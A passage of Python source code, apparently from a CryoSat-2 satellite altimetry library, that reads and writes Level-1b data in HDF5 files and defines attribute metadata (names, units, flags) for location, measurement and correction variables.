elif isinstance(att_val,str) and att_name:
#-- if att_val is string
fileID['METADATA']['SPH'].attrs[att_name] = att_val
#-- Data Set Descriptors (DSD) are all strings
for att_name,att_val in CS_l1b_mds['METADATA']['DSD'].items():
fileID['METADATA']['DSD'].attrs[att_name] = att_val
elif (HEADER == 2):
#-- HEADER 2 is for merged CryoSat-2 files from convert_cryosat_L1b.py
fileID.create_group('METADATA')
fileID['METADATA'].create_group('MPH')
fileID['METADATA'].create_group('SPH')
fileID['METADATA'].create_group('DSD')
#-- Main Product Header (MPH) are all strings
for fi in CS_l1b_mds['METADATA']['MPH'].keys():
fileID['METADATA']['MPH'].create_group(fi)
for att_name,att_val in CS_l1b_mds['METADATA']['MPH'][fi].items():
fileID['METADATA']['MPH'][fi].attrs[att_name] = att_val
#-- Specific Product Header (SPH) are both strings and dictionaries
for fi in CS_l1b_mds['METADATA']['SPH'].keys():
fileID['METADATA']['SPH'].create_group(fi)
for att_name,att_val in CS_l1b_mds['METADATA']['SPH'][fi].items():
if isinstance(att_val,dict):
#-- if att_val is dictionary
fileID['METADATA']['SPH'][fi].create_group(att_name)
for dsn,dsv in att_val.items():
fileID['METADATA']['SPH'][fi][att_name].attrs[dsn] = dsv
elif isinstance(att_val,str) and att_name:
#-- if att_val is string
fileID['METADATA']['SPH'][fi].attrs[att_name] = att_val
#-- Data Set Descriptors (DSD) are all strings
for fi in CS_l1b_mds['METADATA']['DSD'].keys():
fileID['METADATA']['DSD'].create_group(fi)
for att_name,att_val in CS_l1b_mds['METADATA']['DSD'][fi].items():
fileID['METADATA']['DSD'][fi].attrs[att_name] = att_val
#-- output file title
fileID.attrs['description'] = TITLE
#-- Output HDF5 structure information
if VERBOSE:
print(FILENAME)
print(list(fileID.keys()))
#-- Closing the HDF5 file
fileID.close()
#-- PURPOSE: read CryoSat-2 HDF5 files
def read_HDF5_cryosat_L1b(FILENAME, ATTRIBUTES=True, VERBOSE=False):
#-- Open the HDF5 file for reading
fileID = h5py.File(os.path.expanduser(FILENAME), 'r')
#-- Output HDF5 file information
if VERBOSE:
print(fileID.filename)
print(list(fileID.keys()))
#-- allocate python dictionaries for output CS_l1b_mds variables
CS_l1b_mds = {}
CS_l1b_mds['Location'] = {}
CS_l1b_mds['Data'] = {}
CS_l1b_mds['Geometry'] = {}
CS_l1b_mds['Waveform_1Hz'] = {}
CS_l1b_mds['Waveform_20Hz'] = {}
#-- get each HDF5 variable
#-- CryoSat-2 Location Group
for key in fileID['Location'].keys():
if key in ('Sat_velocity','Real_beam','Baseline'):
CS_l1b_mds['Location'][key] = fileID['Location'][key][:,:,:]
else:
CS_l1b_mds['Location'][key] = fileID['Location'][key][:,:]
#-- CryoSat-2 Measurement Group
for key in fileID['Data'].keys():
CS_l1b_mds['Data'][key] = fileID['Data'][key][:,:]
#-- CryoSat-2 External Corrections Group
for key in fileID['Geometry'].keys():
CS_l1b_mds['Geometry'][key] = fileID['Geometry'][key][:]
#-- CryoSat-2 Average Waveform Group
for key in fileID['Waveform_1Hz'].keys():
if key in ('Waveform'):
CS_l1b_mds['Waveform_1Hz'][key] = fileID['Waveform_1Hz'][key][:,:]
else:
CS_l1b_mds['Waveform_1Hz'][key] = fileID['Waveform_1Hz'][key][:]
#-- CryoSat-2 Waveform Group
for key in fileID['Waveform_20Hz'].keys():
if key in ('Waveform','Coherence','Phase_diff'):
CS_l1b_mds['Waveform_20Hz'][key] = fileID['Waveform_20Hz'][key][:,:,:]
elif key in ('Beam'):
CS_l1b_mds['Waveform_20Hz'][key] = {}
for ds_name,ds_val in fileID['Waveform_20Hz'][key].items():
CS_l1b_mds['Waveform_20Hz'][key][ds_name] = ds_val[:,:]
else:
CS_l1b_mds['Waveform_20Hz'][key] = fileID['Waveform_20Hz'][key][:,:]
#-- Getting attributes of included variables
if ATTRIBUTES:
#-- allocate python dictionaries for output CS_l1b_mds attributes
CS_l1b_mds['Attributes'] = {}
CS_l1b_mds['Attributes']['Location'] = {}
CS_l1b_mds['Attributes']['Data'] = {}
CS_l1b_mds['Attributes']['Geometry'] = {}
CS_l1b_mds['Attributes']['Waveform_1Hz'] = {}
CS_l1b_mds['Attributes']['Waveform_20Hz'] = {}
#-- CryoSat-2 Location Group
for key in fileID['Location'].keys():
CS_l1b_mds['Attributes']['Location'][key] = {}
for att_name,att_val in fileID['Location'][key].attrs.items():
CS_l1b_mds['Attributes']['Location'][key][att_name] = att_val
#-- CryoSat-2 Measurement Group
for key in fileID['Data'].keys():
CS_l1b_mds['Attributes']['Data'][key] = {}
for att_name,att_val in fileID['Data'][key].attrs.items():
CS_l1b_mds['Attributes']['Data'][key][att_name] = att_val
#-- CryoSat-2 External Corrections Group
for key in fileID['Geometry'].keys():
CS_l1b_mds['Attributes']['Geometry'][key] = {}
for att_name,att_val in fileID['Geometry'][key].attrs.items():
CS_l1b_mds['Attributes']['Geometry'][key][att_name] = att_val
#-- CryoSat-2 Average Waveform Group
for key in fileID['Waveform_1Hz'].keys():
CS_l1b_mds['Attributes']['Waveform_1Hz'][key] = {}
for att_name,att_val in fileID['Waveform_1Hz'][key].attrs.items():
CS_l1b_mds['Attributes']['Waveform_1Hz'][key][att_name] = att_val
#-- CryoSat-2 Waveform Group
for key in fileID['Waveform_20Hz'].keys():
if key in ('Beam'):
CS_l1b_mds['Attributes']['Waveform_20Hz'][key] = {}
for dsn in fileID['Waveform_20Hz'][key].keys():
CS_l1b_mds['Attributes']['Waveform_20Hz'][key][dsn] = {}
for atn,atv in fileID['Waveform_20Hz'][key][dsn].attrs.items():
CS_l1b_mds['Attributes']['Waveform_20Hz'][key][dsn][atn] = atv
else:
CS_l1b_mds['Attributes']['Waveform_20Hz'][key] = {}
for atn,atv in fileID['Waveform_20Hz'][key].attrs.items():
CS_l1b_mds['Attributes']['Waveform_20Hz'][key][atn] = atv
#-- Global attribute description
CS_l1b_mds['Attributes']['title'] = fileID.attrs['description']
#-- Closing the HDF5 file
fileID.close()
return CS_l1b_mds
#-- PURPOSE: get the number of records and number of blocks in an HDF5 file
def HDF5_cryosat_L1b_shape(FILENAME):
#-- Open the HDF5 file for reading
with h5py.File(os.path.expanduser(FILENAME), 'r') as fid:
n_records,n_blocks = fid['Location']['Day'].shape
n_1Hz_wfm = fid['Waveform_1Hz']['Waveform'].shape[1]
n_20Hz_wfm = fid['Waveform_20Hz']['Waveform'].shape[2]
return (n_records,n_blocks,n_1Hz_wfm,n_20Hz_wfm)
#-- PURPOSE: get attribute names for baseline
def cryosat_L1b_attributes(MODE, BASELINE):
#-- CryoSat-2 Time and Orbit Group
L1b_location_attributes = {}
#-- Time: day part
L1b_location_attributes['Day'] = {}
L1b_location_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_location_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_location_attributes['Day']['hertz'] = 20
#-- Time: second part
L1b_location_attributes['Second'] = {}
L1b_location_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_location_attributes['Second']['units'] = 'seconds'
L1b_location_attributes['Second']['hertz'] = 20
#-- Time: microsecond part
L1b_location_attributes['Micsec'] = {}
L1b_location_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_location_attributes['Micsec']['units'] = 'microseconds'
L1b_location_attributes['Micsec']['hertz'] = 20
#-- USO correction factor
L1b_location_attributes['USO_Corr'] = {}
L1b_location_attributes['USO_Corr']['long_name'] = ('DORIS Ultra Stable '
'Oscillator drift correction factor')
L1b_location_attributes['USO_Corr']['description'] = ('USO_Corr_Factor = '
'USO_freq_nominal / (USO_freq_nominal + model_freq_deviation). '
'USO_freq_nominal is the nominal frequency provided in the IPF database.'
'model_freq_deviation is the modelled frequency deviation provided by '
'the DORIS USO drift file')
L1b_location_attributes['USO_Corr']['units'] = '1e-15'
L1b_location_attributes['USO_Corr']['hertz'] = 20
#-- Mode ID
L1b_location_attributes['Mode_ID'] = {}
L1b_location_attributes['Mode_ID']['long_name'] = 'Mode ID'
L1b_location_attributes['Mode_ID']['description'] = ('Identifies the SIRAL '
'instrument measurement mode. See table 2.3.3-2 of the "L1b Products '
'Format Specification" document')
L1b_location_attributes['Mode_ID']['units'] = '1e-15'
L1b_location_attributes['Mode_ID']['flag_meanings'] = 'lrm sar sarin'
L1b_location_attributes['Mode_ID']['hertz'] = 20
#-- Mode Flags
L1b_location_attributes['Mode_flags'] = {}
L1b_location_attributes['Mode_flags']['long_name'] = 'Mode flags'
L1b_location_attributes['Mode_flags']['description'] = ('Flags related to '
'sub-modes of SARIn mode from instrument configuration bits in L0. '
'Identifies the sarin degraded case and the CAL4 flag')
L1b_location_attributes['Mode_flags']['flag_meanings'] = ('sarin_degraded_case '
'cal4_packet_detection')
L1b_location_attributes['Mode_flags']['hertz'] = 20
#-- Platform attitude control mode
L1b_location_attributes['Att_control'] = {}
L1b_location_attributes['Att_control']['long_name'] = 'Platform Attitude Control'
L1b_location_attributes['Att_control']['description'] = ('Platform attitude '
'control mode from instrument configuration bits in L0.')
L1b_location_attributes['Att_control']['flag_meanings'] = ('unknown '
'local_normal_pointing yaw_steering')
L1b_location_attributes['Att_control']['hertz'] = 20
#-- Source sequence counter
L1b_location_attributes['SSC'] = {}
L1b_location_attributes['SSC']['long_name'] = 'Source sequence counter'
L1b_location_attributes['SSC']['description'] = ('Read from the L0 echo '
'telemetry packet (of the master channel in the case of SARin).'
'This is a 16384 cyclic modulo counter, starting from 0, incrementing '
'by 1. A separate counter is maintained for each instrument mode')
L1b_location_attributes['SSC']['hertz'] = 20
#-- Instrument configuration
L1b_location_attributes['Inst_config'] = {}
L1b_location_attributes['Inst_config']['long_name'] = ('Instrument '
'Configuration flag')
L1b_location_attributes['Inst_config']['description'] = ('This is derived '
'from flags in the L0 packets for tracking and the echo. See table '
'2.3.3-3 of the "L1b Products Format Specification" document.')
L1b_location_attributes['Inst_config']['flag_meanings'] = ('siral_redundant '
'external_cal open_loop loss_of_echo real_time_error echo_saturation '
'rx_band_attenuated cycle_report_error')
L1b_location_attributes['Inst_config']['hertz'] = 20
#-- acquisition band
L1b_location_attributes['Inst_band'] = {}
L1b_location_attributes['Inst_band']['long_name'] = 'Acquisition Band'
L1b_location_attributes['Inst_band']['description'] = ('This flag '
'contains the acquisition band of the SIRAL instrument.')
L1b_location_attributes['Inst_band']['flag_meanings'] = ('unknown '
'320_mhz 40_mhz')
L1b_location_attributes['Inst_band']['hertz'] = 20
#-- instrument channel
L1b_location_attributes['Inst_channel'] = {}
L1b_location_attributes['Inst_channel']['long_name'] = 'Rx Channel'
L1b_location_attributes['Inst_channel']['description'] = ('This flag '
'contains the SIRAL instrument channel in use.')
L1b_location_attributes['Inst_channel']['flag_meanings'] = ('unknown '
'rx1 rx2 both')
L1b_location_attributes['Inst_channel']['hertz'] = 20
#-- tracking mode
L1b_location_attributes['Tracking_mode'] = {}
L1b_location_attributes['Tracking_mode']['long_name'] = 'Tracking Mode'
L1b_location_attributes['Tracking_mode']['description'] = ('This flag '
'indicates the tracking mode of the SIRAL instrument.')
L1b_location_attributes['Tracking_mode']['flag_meanings'] = ('unknown '
'lrm sar sarin')
L1b_location_attributes['Tracking_mode']['hertz'] = 20
#-- Record Counter
L1b_location_attributes['Rec_Count'] = {}
L1b_location_attributes['Rec_Count']['long_name'] = ('Instrument '
'Configuration flag')
L1b_location_attributes['Rec_Count']['description'] = ('Progressive counter '
'incremented by 1 for each data block. Hence the first full MDS record '
'contains the numbers 1-20, the second 21-40, etc.')
L1b_location_attributes['Rec_Count']['hertz'] = 20
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Lat'] = {}
L1b_location_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_location_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_location_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_location_attributes['Lat']['valid_min'] = -9e8
L1b_location_attributes['Lat']['valid_max'] = 9e8
L1b_location_attributes['Lat']['hertz'] = 20
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Lon'] = {}
L1b_location_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_location_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_location_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_location_attributes['Lon']['valid_min'] = -18e8
L1b_location_attributes['Lon']['valid_max'] = 18e8
L1b_location_attributes['Lon']['hertz'] = 20
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_location_attributes['Alt'] = {}
L1b_location_attributes['Alt']['long_name'] = 'Altitude'
L1b_location_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_location_attributes['Alt']['units'] = 'millimeters'
L1b_location_attributes['Alt']['hertz'] = 20
#-- Instantaneous altitude rate derived from orbit: packed units (mm/s, 1e-3 m/s)
L1b_location_attributes['Alt_rate'] = {}
L1b_location_attributes['Alt_rate']['long_name'] = 'Altitude Rate'
L1b_location_attributes['Alt_rate']['description'] = ('Instantaneous '
'altitude rate derived from orbit corresponding to the MDSR Time Stamp')
L1b_location_attributes['Alt_rate']['units'] = 'millimeters/second'
L1b_location_attributes['Alt_rate']['hertz'] = 20
#-- Satellite velocity vector. In ITRF: packed units (mm/s, 1e-3 m/s)
#-- ITRF= International Terrestrial Reference Frame
L1b_location_attributes['Sat_velocity'] = {}
L1b_location_attributes['Sat_velocity']['long_name'] = ('Satellite velocity '
'vector')
L1b_location_attributes['Sat_velocity']['description'] = ('In the '
'International Terrestrial Reference Frame (ITRF) in the International '
'Earth Fixed System. From Orbit CFI call. This is not a unit vector as '
'the velocity magnitude is also required.')
L1b_location_attributes['Sat_velocity']['units'] = 'millimeters/second'
L1b_location_attributes['Sat_velocity']['hertz'] = 20
#-- Real beam direction vector. In CRF: packed units (micro-m, 1e-6 m)
#-- CRF= CryoSat Reference Frame.
L1b_location_attributes['Real_beam'] = {}
L1b_location_attributes['Real_beam']['long_name'] = ('Real beam direction '
'vector')
L1b_location_attributes['Real_beam']['description'] = ('In the '
'CryoSat Reference Frame (CRF). This is a unit vector.')
L1b_location_attributes['Real_beam']['units'] = 'micrometers'
L1b_location_attributes['Real_beam']['hertz'] = 20
#-- Interferometric baseline vector. In CRF: packed units (micro-m, 1e-6 m)
L1b_location_attributes['Baseline'] = {}
L1b_location_attributes['Baseline']['long_name'] = ('Interferometric '
'baseline vector')
L1b_location_attributes['Baseline']['description'] = ('In the '
'CryoSat Reference Frame (CRF). This is a unit vector.')
L1b_location_attributes['Baseline']['units'] = 'micrometers'
L1b_location_attributes['Baseline']['hertz'] = 20
#-- Star Tracker ID and Spacecraft mispointing for Baseline-C and D
if BASELINE in ('C','D'):
#-- Star Tracker ID
L1b_location_attributes['ST_ID'] = {}
L1b_location_attributes['ST_ID']['long_name'] = 'Star Tracker ID'
L1b_location_attributes['ST_ID']['hertz'] = 20
#-- Antenna Bench Roll Angle (Derived from star trackers)
#-- packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Roll'] = {}
L1b_location_attributes['Roll']['long_name'] = ('Antenna Bench Roll '
'Angle derived from star trackers')
L1b_location_attributes['Roll']['units'] = '0.1 micro-degree'
L1b_location_attributes['Roll']['hertz'] = 20
#-- Antenna Bench Pitch Angle (Derived from star trackers)
#-- packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Pitch'] = {}
L1b_location_attributes['Pitch']['long_name'] = ('Antenna Bench Pitch '
'Angle derived from star trackers')
L1b_location_attributes['Pitch']['units'] = '0.1 micro-degree'
L1b_location_attributes['Pitch']['hertz'] = 20
#-- Antenna Bench Yaw Angle (Derived from star trackers)
#-- packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Yaw'] = {}
L1b_location_attributes['Yaw']['long_name'] = ('Antenna Bench Yaw '
'Angle derived from star trackers')
L1b_location_attributes['Yaw']['units'] = '0.1 micro-degree'
L1b_location_attributes['Yaw']['hertz'] = 20
#-- Measurement Confidence Data Flags
L1b_location_attributes['MCD'] = {}
L1b_location_attributes['MCD']['long_name'] = ('Measurement Confidence '
'Data Flags')
L1b_location_attributes['MCD']['description'] = ('Generally the MCD flags '
'indicate problems when set. If MCD is 0 then no problems or non-nominal '
'conditions were detected. Serious errors are indicated by setting bit 31')
L1b_location_attributes['MCD']['flag_meanings'] = ('block_degraded '
'blank_block datation_degraded orbit_prop_error orbit_file_change '
'orbit_gap echo_saturated other_echo_error sarin_rx1_error '
'sarin_rx2_error window_delay_error agc_error cal1_missing '
'cal1_default doris_uso_missing ccal1_default trk_echo_error '
'echo_rx1_error echo_rx2_error npm_error cal1_pwr_corr_type '
'phase_pert_cor_missing cal2_missing cal2_default power_scale_error '
'attitude_cor_missing phase_pert_cor_default')
L1b_location_attributes['MCD']['hertz'] = 20
#-- CryoSat-2 Measurement Group
L1b_measurement_attributes = {}
#-- Window Delay reference (two-way) corrected for instrument delays
L1b_measurement_attributes['TD'] = {}
L1b_measurement_attributes['TD']['long_name'] = 'Window Delay'
L1b_measurement_attributes['TD']['description'] = ('Window delay from the '
'telemetry converted to physical units. This is a 2-way measurement: '
'the time taken for the radar pulse to travel to the surface and back.'
'COM offset is applied and Calibration correction from CAL1 is applied')
L1b_measurement_attributes['TD']['units'] = 'picoseconds'
L1b_measurement_attributes['TD']['hertz'] = 20
#-- H0 Initial Height Word from telemetry
L1b_measurement_attributes['H_0'] = {}
L1b_measurement_attributes['H_0']['long_name'] = 'H0 Initial Height Word'
L1b_measurement_attributes['H_0']['units'] = '48.8 ps'
L1b_measurement_attributes['H_0']['hertz'] = 20
#-- COR2 Height Rate: on-board tracker height rate over the radar cycle
L1b_measurement_attributes['COR2'] = {}
L1b_measurement_attributes['COR2']['long_name'] = 'COR2 Height Rate'
L1b_measurement_attributes['COR2']['description'] = ('On-board tracker '
'height rate over the radar cycle')
L1b_measurement_attributes['COR2']['units'] = '3.05 ps/rc'
L1b_measurement_attributes['COR2']['hertz'] = 20
#-- Coarse Range Word (LAI) derived from telemetry
L1b_measurement_attributes['LAI'] = {}
L1b_measurement_attributes['LAI']['long_name'] = 'Coarse Range Word'
L1b_measurement_attributes['LAI']['units'] = '12.5 ns'
L1b_measurement_attributes['LAI']['hertz'] = 20
#-- Fine Range Word (FAI) derived from telemetry
L1b_measurement_attributes['FAI'] = {}
L1b_measurement_attributes['FAI']['long_name'] = 'Fine Range Word'
L1b_measurement_attributes['FAI']['units'] = '12.5/256 ns'
L1b_measurement_attributes['FAI']['hertz'] = 20
#-- Automatic Gain Control Channel 1: AGC gain applied on Rx channel 1.
#-- Gain calibration corrections are applied (Sum of AGC stages 1 and 2
#-- plus the corresponding corrections) (dB/100)
L1b_measurement_attributes['AGC_CH1'] = {}
L1b_measurement_attributes['AGC_CH1']['long_name'] = ('Automatic Gain '
'Control Channel 1')
L1b_measurement_attributes['AGC_CH1']['description'] = ('AGC gain applied '
'on Rx channel 1. Gain calibration corrections are applied (Sum of AGC '
'stages 1 and 2 plus the corresponding corrections)')
L1b_measurement_attributes['AGC_CH1']['units'] = 'dB/100'
L1b_measurement_attributes['AGC_CH1']['hertz'] = 20
#-- Automatic Gain Control Channel 2: AGC gain applied on Rx channel 2.
#-- Gain calibration corrections are applied (dB/100)
L1b_measurement_attributes['AGC_CH2'] = {}
L1b_measurement_attributes['AGC_CH2']['long_name'] = ('Automatic Gain '
'Control Channel 2')
L1b_measurement_attributes['AGC_CH2']['description'] = ('AGC gain applied '
'on Rx channel 2.')
L1b_measurement_attributes['AGC_CH2']['units'] = 'dB/100'
L1b_measurement_attributes['AGC_CH2']['hertz'] = 20
#-- Total Fixed Gain On Channel 1: gain applied by the RF unit. (dB/100)
L1b_measurement_attributes['TR_gain_CH1'] = {}
L1b_measurement_attributes['TR_gain_CH1']['long_name'] = ('Total Fixed Gain '
'On Channel 1')
L1b_measurement_attributes['TR_gain_CH1']['description'] = ('Gain applied '
'by the RF unit.')
L1b_measurement_attributes['TR_gain_CH1']['units'] = 'dB/100'
L1b_measurement_attributes['TR_gain_CH1']['hertz'] = 20
#-- Total Fixed Gain On Channel 2: gain applied by the RF unit. (dB/100)
L1b_measurement_attributes['TR_gain_CH2'] = {}
L1b_measurement_attributes['TR_gain_CH2']['long_name'] = ('Total Fixed Gain '
'On Channel 2')
L1b_measurement_attributes['TR_gain_CH2']['description'] = ('Gain applied '
'by the RF unit.')
L1b_measurement_attributes['TR_gain_CH2']['units'] = 'dB/100'
L1b_measurement_attributes['TR_gain_CH2']['hertz'] = 20
#-- Transmit Power in microWatts
L1b_measurement_attributes['TX_Power'] = {}
L1b_measurement_attributes['TX_Power']['long_name'] = 'Transmit Power'
L1b_measurement_attributes['TX_Power']['units'] = 'microWatts'
L1b_measurement_attributes['TX_Power']['hertz'] = 20
#-- Doppler range correction: Radial component (mm)
#-- computed for the component of satellite velocity in the nadir direction
L1b_measurement_attributes['Doppler_range'] = {}
L1b_measurement_attributes['Doppler_range']['long_name'] = ('Doppler range '
'correction')
L1b_measurement_attributes['Doppler_range']['description'] = ('Radial '
'component computed for the component of satellite velocity in the '
'nadir direction.')
L1b_measurement_attributes['Doppler_range']['units'] = 'mm'
L1b_measurement_attributes['Doppler_range']['hertz'] = 20
#-- Value of Doppler Angle for the first single look echo (1e-7 radians)
L1b_measurement_attributes['Doppler_angle_start'] = {}
L1b_measurement_attributes['Doppler_angle_start']['long_name'] = ('Doppler '
'angle start')
L1b_measurement_attributes['Doppler_angle_start']['description'] = ('Value '
'of Doppler Angle for the first single look echo in the stack. It is '
'the angle between: (a) direction perpendicular to the velocity '
'vector, (b) direction from satellite to surface location. The Doppler '
'angle depends on velocity vector and on geometry.')
L1b_measurement_attributes['Doppler_angle_start']['units'] = '1e-7 radians'
L1b_measurement_attributes['Doppler_angle_start']['hertz'] = 20
#-- Value of Doppler Angle for the last single look echo (1e-7 radians)
L1b_measurement_attributes['Doppler_angle_stop'] = {}
L1b_measurement_attributes['Doppler_angle_stop']['long_name'] = ('Doppler '
'angle stop')
L1b_measurement_attributes['Doppler_angle_stop']['description'] = ('Value '
'of Doppler Angle for the last single look echo in the stack. It is '
'the angle between: (a) direction perpendicular to the velocity '
'vector, (b) direction from satellite to surface location. The Doppler '
'angle depends on velocity vector and on geometry.')
L1b_measurement_attributes['Doppler_angle_stop']['units'] = '1e-7 radians'
L1b_measurement_attributes['Doppler_angle_stop']['hertz'] = 20
#-- Instrument Range Correction: transmit-receive antenna (mm)
#-- Calibration correction to range on channel 1 computed from CAL1.
L1b_measurement_attributes['TR_inst_range'] = {}
L1b_measurement_attributes['TR_inst_range']['long_name'] = ('Instrument '
'Range Correction: transmit-receive antenna')
L1b_measurement_attributes['TR_inst_range']['description'] = ('Calibration '
'correction to range on channel 1 computed from CAL1.')
L1b_measurement_attributes['TR_inst_range']['units'] = 'mm'
L1b_measurement_attributes['TR_inst_range']['hertz'] = 20
#-- Instrument Range Correction: receive-only antenna (mm)
#-- Calibration correction to range on channel 2 computed from CAL1.
L1b_measurement_attributes['R_inst_range'] = {}
L1b_measurement_attributes['R_inst_range']['long_name'] = ('Instrument '
'Range Correction: receive-only antenna')
L1b_measurement_attributes['R_inst_range']['description'] = ('Calibration '
'correction to range on channel 2 computed from CAL1.')
L1b_measurement_attributes['R_inst_range']['units'] = 'mm'
L1b_measurement_attributes['R_inst_range']['hertz'] = 20
#-- Instrument Gain Correction: transmit-receive antenna (dB/100)
#-- Calibration correction to gain on channel 1 computed from CAL1
L1b_measurement_attributes['TR_inst_gain'] = {}
L1b_measurement_attributes['TR_inst_gain']['long_name'] = ('Instrument '
'Gain Correction: transmit-receive antenna')
L1b_measurement_attributes['TR_inst_gain']['description'] = ('Calibration '
'correction to gain on channel 1 computed from CAL1.')
L1b_measurement_attributes['TR_inst_gain']['units'] = 'dB/100'
L1b_measurement_attributes['TR_inst_gain']['hertz'] = 20
#-- Instrument Gain Correction: receive-only (dB/100)
#-- Calibration correction to gain on channel 2 computed from CAL1
L1b_measurement_attributes['R_inst_gain'] = {}
L1b_measurement_attributes['R_inst_gain']['long_name'] = ('Instrument '
'Gain Correction: receive-only antenna')
L1b_measurement_attributes['R_inst_gain']['description'] = ('Calibration '
'correction to gain on channel 2 computed from CAL1.')
L1b_measurement_attributes['R_inst_gain']['units'] = 'dB/100'
L1b_measurement_attributes['R_inst_gain']['hertz'] = 20
#-- Internal Phase Correction (microradians)
L1b_measurement_attributes['Internal_phase'] = {}
L1b_measurement_attributes['Internal_phase']['long_name'] = ('Internal '
'Phase Correction')
L1b_measurement_attributes['Internal_phase']['description'] = ('Set to '
'zero due to no availability of correction until specialized FBR-L1B '
'processing.')
L1b_measurement_attributes['Internal_phase']['units'] = 'microradians'
L1b_measurement_attributes['Internal_phase']['hertz'] = 20
#-- External Phase Correction (microradians)
L1b_measurement_attributes['External_phase'] = {}
L1b_measurement_attributes['External_phase']['long_name'] = ('External '
'Phase Correction')
L1b_measurement_attributes['External_phase']['description'] = ('Taken from '
'the IPFDB file (SARIN only) to be added to the internal phase '
'correction term. The external phase correction is the temperature-'
'averaged component of external inter-channel phase difference derived '
'from phase difference sensitive antenna subsystem, waveguides and '
'instrument waveguide switches. The external phase correction does not '
'contain internal instrument temperature dependent effects of '
'calibration coupler and duplexer which are dealt with by the CAL-4 '
'signal. These CAL-4 data are processed to compute the internal phase '
'correction parameter.')
L1b_measurement_attributes['External_phase']['units'] = 'microradians'
L1b_measurement_attributes['External_phase']['hertz'] = 20
#-- Noise Power measurement (dB/100): converted from telemetry units to be
#-- the noise floor of FBR measurement echoes.
#-- Set to -9999.99 when the telemetry contains zero.
L1b_measurement_attributes['Noise_power'] = {}
L1b_measurement_attributes['Noise_power']['long_name'] = 'Noise power'
L1b_measurement_attributes['Noise_power']['description'] = ('Noise power '
'measurement converted from telemetry units to be the noise floor of '
'FBR measurement echoes. This field is set to the default value equal '
'to -9999.99 when the telemetry contains zero.')
L1b_measurement_attributes['Noise_power']['units'] = 'dB/100'
L1b_measurement_attributes['Noise_power']['_FillValue'] = -9999.99
L1b_measurement_attributes['Noise_power']['hertz'] = 20
#-- Phase slope correction (microradians)
#-- Computed from the CAL-4 packets during the azimuth impulse response
#-- amplitude (SARIN only). Set from the latest available CAL-4 packet.
L1b_measurement_attributes['Phase_slope'] = {}
L1b_measurement_attributes['Phase_slope']['long_name'] = ('Phase Slope '
'Correction')
L1b_measurement_attributes['Phase_slope']['description'] = ('Differential '
'group delay phase difference slope correction (across the whole '
'bandwidth): fixed and variable group delays introduce a phase '
'difference slope across the instrument bandwidth. Fixed elements of '
'differential group delay have been determined during ground testing '
'and characterisation and cover the elements of antenna, calibration '
'coupler, Louis waveguide. These fixed elements can be retrieved from '
'the IPFDB. Variable elements cover differences between the CAL-1 and '
'CAL-4 paths and can be computed by processing the CAL-1 and CAL-4 data. '
'SIR_SAR_1B and SIR_LRM_1B products contain this parameter but is set '
'to zero. Since the correction can only be made at the rate of the '
'CAL-4 which is 1 Hz and the measurement group high rate blocks are '
'provided at 20 Hz the product provides the closest in time to FBR '
'value of slope correction.')
L1b_measurement_attributes['Phase_slope']['units'] = 'microradians'
L1b_measurement_attributes['Phase_slope']['hertz'] = 20
#-- CryoSat-2 External Corrections Group
L1b_corr_attributes = {}
#-- Dry Tropospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['dryTrop'] = {}
L1b_corr_attributes['dryTrop']['long_name'] = 'Dry Tropospheric Correction'
L1b_corr_attributes['dryTrop']['description'] = ('Altimeter range correction'
' due to the dry-gas component of the Earths atmosphere')
L1b_corr_attributes['dryTrop']['units'] = 'millimeters'
L1b_corr_attributes['dryTrop']['hertz'] = 1
#-- Wet Tropospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['wetTrop'] = {}
L1b_corr_attributes['wetTrop']['long_name'] = 'Wet Tropospheric Correction'
L1b_corr_attributes['wetTrop']['description'] = ('Altimeter range correction'
' due to the water component of the Earths atmosphere')
L1b_corr_attributes['wetTrop']['units'] = 'millimeters'
L1b_corr_attributes['wetTrop']['hertz'] = 1
#-- Inverse Barometric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['InvBar'] = {}
L1b_corr_attributes['InvBar']['long_name'] = 'Inverse Barometric Correction'
L1b_corr_attributes['InvBar']['description'] = ('Altimeter range correction '
'for the depression of the ocean surface caused by the local barometric '
'pressure')
L1b_corr_attributes['InvBar']['units'] = 'millimeters'
L1b_corr_attributes['InvBar']['hertz'] = 1
#-- Dynamic Atmosphere Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['DAC'] = {}
L1b_corr_attributes['DAC']['long_name'] = 'Dynamic Atmosphere Correction'
L1b_corr_attributes['DAC']['description'] = ('Altimeter range correction '
'for both the Inverse Barometric effect and the high-frequency dynamic '
'component of the wind effect on the ocean. Only one of inverse '
'barometric correction and DAC have to be used as they are alternatives')
L1b_corr_attributes['DAC']['units'] = 'millimeters'
L1b_corr_attributes['DAC']['hertz'] = 1
#-- GIM Ionospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['Iono_GIM'] = {}
L1b_corr_attributes['Iono_GIM']['long_name'] = 'Ionospheric Correction'
L1b_corr_attributes['Iono_GIM']['description'] = ('Altimeter range correction '
'for the delay of the radar pulse caused by free electrons in the '
'ionosphere. Computed a GPS satellite-derived (GIM) map')
L1b_corr_attributes['Iono_GIM']['units'] = 'millimeters'
L1b_corr_attributes['Iono_GIM']['hertz'] = 1
#-- Model Ionospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['Iono_model'] = {}
